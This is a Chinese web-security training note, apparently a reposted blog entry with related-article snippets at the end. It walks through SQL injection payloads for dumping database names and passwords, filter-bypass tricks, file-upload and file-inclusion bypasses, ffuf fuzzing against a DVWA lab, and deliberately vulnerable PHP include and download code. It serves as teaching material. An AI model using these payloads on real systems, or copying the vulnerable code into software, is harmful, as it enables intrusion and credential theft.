网安培训第一期——sql注入+文件

文章目录

  • sql inject
    • 报错注入
    • time盲注
    • 联合查询
    • 万能密码
    • 拦截和过滤
    • ascii
    • 注入流程
    • base64
    • 查询的列名为mysql保留关键字key
  • 文件上传
    • ffuf
    • 脚本要做的三件事
    • 网络端口进程
    • 用户权限
    • 文件
    • 文件包含
    • 文件下载
    • XSS跨站请求攻击
    • csrf跨站请求伪造

sql inject

  1. 判断输入字段是字符串还是数字
    方法:
-- 字符串——显示全部内容(1是为了回显有效的数字,去掉网站正常查询出的信息)
1#    
-- 数字——显示全部内容
1 # 
  1. 判断回显字段数量
-- 通过二分法调整n的数量来判断列数
1' order by n #
-1' union select 1,2,3,4 #

3.在回显字符串处替代要获取的内容(一般是获取数据库名)

-1union select 1,database(),user(),version() #

4.通过数据库名获取有用表名

-1union select 1,2,table_name,4 from information_schema.tables where table_schema=database() #

5.通过表名获取有用列名(假设获取到表名为user)
注意:单引号可能造成错误闭合,可以在此处使用16进制的表名

1union select 1,2,column_name,4 from information_schema.columns where table_name='user' and table_schema=database() #
-- 获取16进制表名
select hex('users');
1union select 1,database(),column_name,4 from information_schema.columns where table_name=0x7573657273 and table_schema=database() #

6.通过列名获取有用信息

1union select 1,username,password,4 from chujiban.user #

报错注入

or updatexml(1,concat(0x7e,(database()),0x7e),1) #

无需试列数
1.查找数据库

or updatexml(1,concat(0x7e,(database()),0x7e),1) #

2.查找表(concat()限制输出结果为32位,且只能输出一个结果,因此必须使用limit 0,1)

-- 可以配合substr()函数获取到32位之后的值   substr(string,start,length)
-- substr('abcdef',2,3)  输出为 'bcd'
or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,100),0x7e),1) #
-- 每次在substr()函数的第二个参数加31,即可全部展示
or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),32,100),0x7e),1) #

3.查找列名

or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,100),0x7e),1) #

4.查找账号密码

or updatexml(1,concat(0x7e,(select username from 'xxx' limit 0,1),0x7e),1) #
or updatexml(1,concat(0x7e,(select password from 'xxx' limit 0,1),0x7e),1) #

time盲注

无回显,或者回显始终不变化的情况使用time盲注

-- if(1=1, sleep(3), 2);  如果第一个参数的值为true,就执行第二个参数,否则执行第三个参数
-- 测试
id=1' and and sleep(10) # #
-- 如果table_name的第一个字母的ascii值>0就直接输出,否则就睡3秒在输出
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 0, 1, sleep(3));

联合查询

联合查询中使前一条语句查询失败的三种方式

  1. id=-1
  2. and 1=2
  3. limit 1,1 筛除最后给的假值

万能密码

1.#和–都被过滤的情况下可以使用 id=1’ or '1

这样sql语句就变成 id='1' or '1'='1'
select * from news where id = '1' or '1';  -- 成功闭合
select * from news where id = '1' or '1' = '1';  -- 成功闭合

拦截和过滤

关键字转义,如or(or,order,information_schema,password),and,union, select等->使用双重关键字寻找,如aandnd,oorderrder,sselectelect。

ascii

-- 1.判断语句正误,查询到值说明正确
select * from news where id = 1 and ascii(substr(database(),1,1)) > 0
-- 2.判断database()首字母的ascii值,查询到值说明ascii>100,否则<100,二分法判断
select * from news where id = 1 and ascii(substr(database(),1,1)) > 100
-- 3.确定database()首字母的ascii值=99
select * from news where id = 1 and ascii(substr(database(),1,1)) = 99;
-- 4.确定database()首字母的为'c'
SELECT CHAR(99);
-- 记住常见的ascii值  a-97 z-122 A-65 Z-90 ascii>=0
-- 查询表名同理
select * from news where id = 1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 0

注入流程

联合查询(union select) > bool盲注(判断ascii) > time盲注(ifsleep()函数)

  1. 首先通过页面判断参数名称,输入一个符号(无输入-整型,单引号/双引号/括号-字符型),页面报错,然后输入%23--+,页面恢复正常,说明闭合。在这里插入图片描述

  2. 若输入%23后页面仍显示报错,则尝试添加 )\ 等符号,当页面恢复正常时即为成功闭合,可以通过and 1=1 正常显示,and 1=2异常,进一步验证是否成功闭合。

  3. 若输入%23后页面显示正常,但是输入and 1=1报错说明存在过滤,分别对and,空格,等号,1进行相应替换尝试,and等关键字可使用双层aandnd(后续order by union select or同理),空格可以换做/**/或/*12138*/,等号可换作like,1可改用其他数字。

  4. 通过order by 1order by n判断前端输出表的列数,若order by 1报错说明存在过滤

  • 成功->使id=-1 使用联合查询union select 1,2,3,...,n进行下一步查找
  • 失败->考虑是否有关键字转义,如or(or,order,information_schema,password),and,union, select等->使用双重关键字寻找,如aandnd,oorderrder,sselectelect

base64

网站代码中设置了对传入参数进行base64解码,因此可以使用base64编码后的值取验证是否存在sql注入

.php?id=1' # 空页面
.php?id=MSc= # 使用base64对1编码,页面报错,即符合上述情况
select `key` from users;  -- 正确

在这里插入图片描述

查询的列名为mysql保留关键字key

select key from users;   -- 报错
select `key` from users;  -- 正确

使用burpsuite爆破admin:1q2w3e4r转base64编码之后的POST请求方式的验证
1.从proxy中找到GET请求发送到repeter,change request成POST
2.sent to Intruder 设置
在这里插入图片描述
3. 爆破后转码 结果->url->base64

在这里插入图片描述

文件上传

  1. 文件名修改 1.jpg -> 1.php,使上传的文件变为可执行
  2. 黑名单 1.php. 或2.phP或3.php空格,绕过 php文件过滤
  3. copy source.jpg/b+1.php target.jpg

ffuf

格式:ffuf -u "目标地址/FUZZ" -w 字典
举例:ffuf -u "http://192.168.111.131/FUZZ" -w /usr/share/SecLists-2022.2/Discovery/Web-Content/common.txt
多个字典同时使用
使用格式:
ffuf -u 目标地址/FUZZ -mc 200 -w 字典路径地址
ffuf -u 目标地址/FUZZ1:FUZZ2 -w 字典:FUZZ1 -w 字典:FUZZ2
带cookie的扫描
ffuf -u http://192.168.111.130/DVWA-master/FUZZ -w /usr/share/SecLists-2022.2/Discovery/Web-Content/common.txt -b "security=low; PHPSESSID=pj0emeebmimf3t9ddpv6pknah0"

脚本要做的三件事

  1. 文件操作
  2. 命令操作
  3. 数据操作

网络端口进程

ipconfig /all
tasklist /svc  //查看进程
netstat /ano //查看端口号

用户权限

文件

copy
move
dir  // 显示文件路径=pwd
type 1.txt // 输出文件内容
echo 123 > 1.txt // 向文件中写入内容
dir /s c:/*.php // 搜索c盘目录下后缀为.php的文件
// 可以通过已查到的文件名确定项目根目录

文件包含

// test1
<?php
$file = $_GET["file"];
include $file;
?>
// 然后在浏览器中通过传参的方式执行包含的文件
// 127.0.0.1/test1.php?file=1.php
// 同时可以查看其他目录文件
// http://127.0.0.1/test1.php?file=./upload/1.jpg 如下图

应用场景:

  1. 文件包含+上传白名单 1.jpg
    在这里插入图片描述
<?php
//$file = $_GET["file"];
// 出于保护,使用固定尾缀的方式命名变量
$file = $_GET["file"]."txt";
include $file;
?>

再次访问1.txt时,出现报错,通过报错信息发现添加了.txt尾缀,此时应该直接通过file=1来访问1.txt
在这里插入图片描述
如何绕过固定尾缀?
浏览器通过%00截断,由于php版本问题目前未验证成功。

  1. 伪协议 参考
    php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。我们可以用如下代码将POST内容转换成base64编码并输出:
php://filter/convert.base64-encode/resource=xxx.php
//test1.php
<?php
$file = $_GET["file"];
include $file;
?>

在这里插入图片描述
base64解码
在这里插入图片描述

(1)开启
allow_url_fopen=On
allow_url_include=On
(2)用户可以动态控制变量
注1: 通常我们在Web中是无法知道allow_url_fopen、allow_url_include的,除非有phpinfo。通常本地包含都是开着的,因为它是默认开启的,而且很少人会改它。通常远程包含会被关掉,但是这说不准。
注2: 从PHP 5.2开始allow_url_include就默认为off的,而allow_url_fopen一直默认都是On的。通常开发人员没特殊情况也不会打开,所以说远程包含漏洞出现的概率很低,但是不代表没有。

  1. %00截断 get请求,要求 php版本 < 5.3.x

通过在代码中实现base64解码,在浏览器需输入base64编码的参数值。

//test1.php
<?php
$file = base64_decode($_GET["file"]);
include $file;
?>

在这里插入图片描述

在这里插入图片描述

伪协议读取源代码,同样需要对php://filter/convert.base64-encode/resource=1.txt进行base64编码。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

文件下载

1.传入文件名进行下载

<?php
// 获取要下载的文件路径
$file = $_GET["filename"];

// 检查文件是否存在
if (file_exists($file)) {
    //获取文件大小
    $filesize = filesize($file); 
    // 设置响应标头
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));

    // 输出文件内容
    readfile($file);
    exit;
} else {
    // 文件不存在的处理逻辑
    die('文件不存在.');
}
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2. 根据数据库中的文件id下载

<?php
header("Content-Type:text/html;charset=utf-8");
include "conf.php";
// 要下载文件的id
$id = $_GET["id"];
$sql = "select * from files where id ='$id'";
$result = mysqli_query($con,$sql);
$row = mysqli_fetch_array($result);

$file = $row['path'];
$filename = $row['path'];
// 检查文件是否存在
if (file_exists($file)) {
    //获取文件大小
    $filesize = filesize($file); 
    // 设置响应标头
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));

    // 输出文件内容
    readfile($file);
    exit;
} else {
    // 文件不存在的处理逻辑
    die('文件不存在.');
}
?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
这种情况容易造成sql注入。

XSS跨站请求攻击

csrf跨站请求伪造

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/347834.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【GitHub项目推荐--开源小游戏】【转载】

01 回合制生存游戏 Cataclysm-DDA 是一款回合制生存游戏&#xff0c;背景设置在后世界末日的世界中。虽然有些人将其描述为“僵尸游戏”&#xff0c;但《大灾变》远不止这些。努力在一个严酷、持久、程序生成的世界中生存。 为食物、设备寻找一个死去的文明的残余物。或者&am…

arcgis 面要素shp数据处理

面要素是工作中用到最多的&#xff0c;那么面要素是如何形成的呢&#xff0c;主要还是由闭合的线要素转换而成。在面要素数据中常用的有以下几点&#xff1a; 一、 线转面&#xff08;要素转面&#xff09; 通过上一篇得到了点转线的要素&#xff0c;那么根据上节的线要素&am…

大模型学习笔记一:大模型应用开发基础

文章目录 一、大模型一些概念介绍 一、大模型一些概念介绍 1&#xff09;产品和大模型的区别&#xff08;产品通过调用大模型来具备的能力&#xff09; 2&#xff09;AGI定义 概念&#xff1a;一切问题可以用AI解决 3&#xff09;大模型通俗原理 根据上文&#xff0c;猜测下…

1174:长整数排序(指针专题)

题目描述 长整数排序。输入n 然后输入n个位数不超过100位的大整数&#xff0c;输入的整数可能含有前导0。将这n个长整数排序后输出&#xff0c;输出不含前导0。int greater(char *s1, char *s2){若s1指向的整数大于s2指向的整数&#xff0c;返回一个正整数;若s1指向的整数小于s…

重生之C++王者归来DAY1

c的概述 c的编程思想&#xff1a;面向对象、泛型编程。 1.第一个c程序 本文用的是QT&#xff0c;VS之类的也可 2.c面向对象的三大特性&#xff08;重要&#xff09; 封装:将相同属性的数据和方法封装在一起&#xff0c;加权限区分&#xff0c;用户只能借助公共方法操作 私有…

PCL 高斯投影正算:大地坐标转高斯投影坐标(C++详细过程版)

目录 一、算法原理二、代码实现三、结果展示四、测试数据PCL 高斯投影正算:大地坐标转高斯投影坐标(C++详细过程版)由CSDN点云侠原创。如果你不是在点云侠的博客中看到该文章,那么此处便是不要脸的爬虫。 一、算法原理 二、代码实现 头文件及读取保存函数见:

SAP同步异常2:SAP删除获利能力特征字段后VF02发货过帐报错。

测试环境VF02过帐报错&#xff0c; 原因是之前删除已经激并使用的获利能力特征字段后&#xff0c;只处理了数据库&#xff0c;没有处理程序。 处理方案&#xff1a; 1、 KEA0 维护经营关注点&#xff1a; 这里WW291已经删除&#xff0c;但没有激活程序。 退出后&#xff…

web安全学习笔记【09】——算法2

基础[1] 入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA #知识点&#xff1a; 1、Web常规-系统&中间件&数据库&源码等 2、Web其他-前后端&软件&Docker&分配站等 3、Web拓展-CDN&WAF&OSS&反向&负载…

2.数据结构 顺序表(自留笔记)

文章目录 一.静态顺序表&#xff1a;长度固定二.动态顺序表1.下面证明原地扩容和异地扩容代码如下&#xff1a;2.下面是写一段Print&#xff0c;打印数字看看&#xff1a;3.头插4.尾删5.头删6.越界一定会报错吗7.下标插入8.下标删除9.查找数字10.应用&#xff1a;利用顺序表写一…

跨平台同步 Shell 历史记录,无缝切换会话 | 开源日报 No.154

atuinsh/atuin Stars: 14.3k License: MIT Atuin 是一个用 SQLite 数据库替换现有 shell 历史记录的工具&#xff0c;可以记录命令的额外上下文&#xff0c;并提供可选且完全加密的历史同步功能。其主要功能和核心优势包括&#xff1a; 重新绑定 ctrl-r 和 up (可配置) 到全屏…

安装宝塔面板后k8s所在节点pod无法正常工作解决方法,kubernetes k8s 与宝塔面板冲突解决方法

在实际项目过程中我们使用了k8s 在生产环境中运行管理服务。 但是对服务器的状态管理我们使用了宝塔面板进行 K8s 版本1.2.8 宝塔面板 版本 8.05 操作步骤是这样的。 1.完成1.2.8 k8s的节点安装&#xff0c;并正常运行服务。 过程略 2.安装宝塔面板 ​ yum install -y …

不要在细节上雕花

前段时间在网上看到一张趣图,有人在社交网络分享学习编程的笔记,一行行手抄代码,字迹清晰,排版工整,霎是认真。 这可能只是个梗,但它让我想起我的学生年代。许多年前我还在念书的时候,班上有不少非常认真的同学,热衷于把课堂笔记做得非常漂亮、工整,有些甚至要用尺子对…

vue —— h函数的学习与使用

文章目录 一、h函数是什么&#xff1f;二、h函数格式说明及使用示例1&#xff1a;简单创建一个VNode&#xff08;vue3&#xff09;示例2&#xff1a;vue2中h函数用法示例3&#xff1a;vue3中h函数的用法vue2和vue3中h函数的区别&#xff1f; 三、h函数实现原理四、h函数常用场景…

java每日一记 —— MySQL窗口函数的使用

MySQL窗口函数 1.什么时窗口函数2.窗口函数的基本应用2.1.排序函数2.2.分布函数2.3.前后函数2.4.头尾函数2.5.聚合函数2.6.其他函数 窗口函数时MySQL8.0中的 注意&#xff1a;窗口函数也有人称为“开窗函数” 1.什么时窗口函数 引入问题&#xff1a;让我们从一个实际的问题开始…

redis排序

文章目录 简介SORT命令的实现ALPHA选项的实现ASC和DESCBYLIMITGET命令 类似映射STORE选项的实现多个命令的执行顺序 简介 Redis的SORT命令可以对列表键、集合键或者有序集合键的值进行排序。 SORT命令的实现 服务器执行SORT numbers 命令的详细步骤如下&#xff1a; 1&#…

在windows安装python版本的tensorrt

文章目录 一、进入官网&#xff0c;下载tensorrt包二、下载后解压并把相应文件拷入对应cuda的文件夹2.1 拷贝头文件2.2 拷贝静态库2.3 拷贝动态库 三、安装whl文件四、验证 一、进入官网&#xff0c;下载tensorrt包 https://developer.nvidia.com/tensorrt-download 这里需要…

接口文档swagger2的使用

Spring-接口文档swagger2 1、swagger/knife4j 接口文档配置 ​ knife4j是swagger的增强版本&#xff0c;更加的小巧、轻量&#xff0c;功能也是更加的完善&#xff0c;UI也更加的清晰&#xff1b;可以从swagger到knife4j无缝切换。 1.1 引入相关依赖 <!--接口文档的开发:…

【Tailwind】各种样式的进度条

基本样式进度条&#xff1a; <div class"mb-5 h-2 rounded-full bg-gray-200"><div class"h-2 rounded-full bg-orange-500" style"width: 50%"></div> </div>带文字的进度条&#xff1a; <div class"relativ…

销售退货单单据录入的序列号当前单据类型不在允许范围内

文章目录 销售退货单单据录入的序列号当前单据类型不在允许范围内报错截图原因分析 销售退货单单据录入的序列号当前单据类型不在允许范围内 报错截图 销售退货单保存 原因分析 销售退货单序列号录入设置&#xff1a; 报错不满足条件的序列号&#xff0c;最后出库是 其他…

golang整合rabbitmq,创建交换机并绑定队列

1,如果要开发消息队列,需要创建交换机和队列,通常有2中方式创建,1种是在面板直接创建 2,第二种就是在代码中创建,这里 展示的是go语言代码中创建rabbitmq package mainimport ("fmt""log""github.com/streadway/amqp" )func main() {// 连接R…